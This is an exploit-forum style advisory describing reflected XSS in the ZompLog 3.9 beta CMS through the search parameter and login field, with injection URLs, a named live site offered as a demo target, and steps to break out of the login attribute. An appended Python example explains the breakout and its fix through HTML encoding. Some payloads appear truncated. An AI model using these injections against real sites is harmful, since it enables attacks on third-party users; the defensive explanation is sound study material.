#############################################################################
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 -C1c4Tr1Z - Gabitzu
# and all darkc0de members
#############################################################################
#
# Author: swappie [aka] faithlove
# Email : swappieakafaithlove@gmail.com
#
# Do researching and share!
#
#############################################################################
#
# Title: ZompLog 3.9 beta
# CMS Link: http://www.zomp.nl/user-content/downloads/zomplog/zomplog3.9-beta.zip
# Vendor: http://www.zomp.nl/
#
#############################################################################
#
# Dork: I'm sure you can figure this out alone, right?
#
#############################################################################

http://www.site.com/index.php?search=>">
http://www.site.com/index.php?search=%00'">
http://www.site.com/index.php?search=>">

Live Demo:
http://www.irishesseling.nl/index.php?search=>">

-----------------------------------------------------------------

*) Another Vulnerability regards the www.site.com/login.php

Method 1.
===========
We can edit the html source code generated by the login.php and edit the following line:

[===]

MAKE IT LOOK LIKE THIS:

" maxlength="15" id="log" />

Method 2.
===========
Step 1. Write in Login section: >">
Step 2. (Hit Enter) or click the Login Button.
        You'll see in Login something looking like this: >\
Step 3. Delete the ">\" part and insert the following code in it:
Step 4. (Hit Enter) or click the Login Button.

Result: You should see a small window with the "XSS Vuln" text in it.

[!!!] This "login.php part" worked just with a fresh install of the CMS as I have installed it locally.

Cheers,
swappie [aka] faithlove
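
Added example (not part of the original advisory and not ZompLog code): a Python model of the login field showing why the `>">` probe comes back as `>\` in Step 2, and how HTML attribute encoding plus a server-side length cap closes the breakout. The `type`/`name` attributes, the `render` and `inspect` helpers, and the assumption that the application backslash-escapes quotes are illustrative; only `maxlength="15" id="log"` and the probe come from the page.

```python
import html
from html.parser import HTMLParser

PROBE = '>">'   # attribute-breakout probe quoted in the advisory
MAX_LEN = 15    # the field's maxlength, enforced on the server in "html" mode

def render(value, mode):
    """Reflect value into a value="" attribute with one escaping strategy."""
    if mode == "raw":            # no escaping
        shown = value
    elif mode == "backslash":    # addslashes-style quoting (assumed behaviour)
        shown = value.replace("\\", "\\\\").replace('"', '\\"')
    elif mode == "html":         # server-side length cap, then attribute encoding
        shown = html.escape(value[:MAX_LEN], quote=True)
    else:
        raise ValueError(mode)
    # Only maxlength="15" id="log" comes from the page; type/name are assumed.
    return f'<input type="text" name="login" value="{shown}" maxlength="15" id="log" />'

class FieldParser(HTMLParser):
    """Records the <input> attributes and any text that escaped the tag."""
    def __init__(self):
        super().__init__()
        self.attrs, self.leaked = None, ""

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)

    def handle_data(self, data):
        self.leaked += data

def inspect(markup):
    """Tokenize markup as an HTML parser would; return (attrs, leaked text)."""
    parser = FieldParser()
    parser.feed(markup)
    parser.close()
    return parser.attrs, parser.leaked

if __name__ == "__main__":
    for mode in ("raw", "backslash", "html"):
        attrs, leaked = inspect(render(PROBE, mode))
        print(f"{mode:9} value={attrs['value']!r} "
              f"maxlength_kept={'maxlength' in attrs} leaked={leaked!r}")
```

In the `raw` and `backslash` modes the tag closes early, so `maxlength` never becomes an attribute and the rest of the markup spills into the page; a backslash means nothing to an HTML parser, which is why only the `html` mode round-trips the submitted value.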